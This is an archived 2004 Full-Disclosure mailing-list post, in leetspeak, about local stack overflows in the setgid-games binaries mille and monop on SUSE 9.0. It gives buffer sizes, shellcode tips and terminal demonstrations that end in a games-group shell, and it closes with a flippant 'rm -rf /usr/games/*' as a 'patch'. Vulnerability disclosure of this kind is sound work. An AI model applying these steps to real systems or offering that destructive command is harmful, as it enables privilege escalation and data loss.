[Full-Disclosure] Suse 9.0 Multiple gid = 20(games) vulnz
From: narko tix (narkotix_at_linuxmail.org)
Date: 04/17/04
- Previous message: Curt Purdy: "RE: Re[2]: [inbox] Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com Date: Sat, 17 Apr 2004 23:06:55 +0800
----- S3CTI0N 0x01 -----
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
Pr0gr4m suid3d t0 games wi7h d3f4ul7.
-3xpl0i747i0n : 0x01-) m4nu4l-) 112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 3xpl0i747i0n.
us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.
0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', '\x90','\220' ch4r4ct3rs.
XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 3sp3ci4lly 0x90 4nd \220.
Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:
addicted@labs:~/c-hell$ ./env
RET = þÿ¿
addicted@labs:~/c-hell$ /usr/games/mille
--HAND-- --DECK-- | ---- ---- -----
P 89 | Hand Total 0 0
1 75 --DISCARD-- | ----- -----
2 Go | Overall Total 0 0
3 Gasoline | Games 0 0
4 Repairs file: þÿ¿ þÿ¿ þÿ¿ þ|
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| p: pick q: quit
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| u: use # o: order hand
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| d: discard # s: save
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| w: toggle window r: reprint
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ|
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ sh-2.05b$ uid=1001(addicted) gid=20(games) groups=100(users)
----- S3CTI0N 0x02 -----
-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz s7ill vuln3r4bl3.
0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
Us3 y0ur ASCII r3t 4ddr3ss.
0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like '\x0b'. XOR them.
3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
addicted@labs:~/c-hell$ ./env
RET = þÿ¿
addicted@labs:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name: þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$
----- S3C7I0N 0x03 -----
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
--------------------------------------------------------------------------------------------------------------------------------------
N4rK07IX
-- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/octet-stream attachment: mille.c
- application/octet-stream attachment: monopexp.c
- Previous message: Curt Purdy: "RE: Re[2]: [inbox] Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
